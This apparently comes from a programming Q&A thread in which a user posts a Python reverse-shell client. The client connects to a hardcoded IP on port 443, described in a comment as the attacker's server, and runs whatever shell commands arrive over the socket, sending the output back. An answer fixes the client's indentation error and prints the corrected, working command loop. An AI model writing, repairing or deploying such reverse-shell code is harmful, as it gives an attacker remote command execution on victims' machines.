# Python - subprocess

Tags: python, python-3.x, subprocess

I've created a python-program to let the server get the client cmd. But there are some problems in it. My server works, it is listening, but I don't know if the shell is working because there is a fault with my client.

```
#! /bin/usr/python
import socket, subprocess

HOST = '81.82.40.78'
PORT = 443

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# connect to server (attacker)
s.connect((HOST, PORT))

# Send we are connected
s.send('Connect established')

# start loop
while 1:
    # Receive shell command
    data = s.recv(1024)
    # Convert to string in case of it being an integer
    # if it's quit, then break out and close socket
    if data == "quit": break
    # Do shell command
        proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        # Read output
        stdout_value = proc.stdout.read() + proc.stderr.read()
        # Send output to server
        s.send(stdout_value)
    # Close socket
    s.close()
```

The mistake that is given to me is:

```
proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
```

There is a problem with the name - how do I go about fixing this?

Comment: Could you elaborate on "there is a problem with the name" ?

Comment: What is not working? Do you get any error? What is the error message and stack trace?

Comment: ile "Client.py", line 23
    proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    ^
IndentationError: unexpected indent

Answer (score 2):

You need to fix your indentation after the `if` statement (which you limited to one line only). I moved the `break` to the next line, indented properly, illustrate:

```
while 1:
    # Receive shell command
    data = s.recv(1024)
    # Convert to string in case of it being an integer
    # if it's quit, then break out and close socket
    if data == "quit":
        break
    # Do shell command
    proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    # Read output
    stdout_value = proc.stdout.read() + proc.stderr.read()
    # Send output to server
    s.send(stdout_value)
# Close socket
s.close()
```

Note that you had indented *everything* from the `if` line onwards one indent too many, including the `s.close()` statement that belongs *outside* of the `while` loop.

Comment: Thank you very much. I work in ubuntu, in the terminal, so it only gives one error at the time. Now I just got a new error, would it be possible to give my code, so you could check it?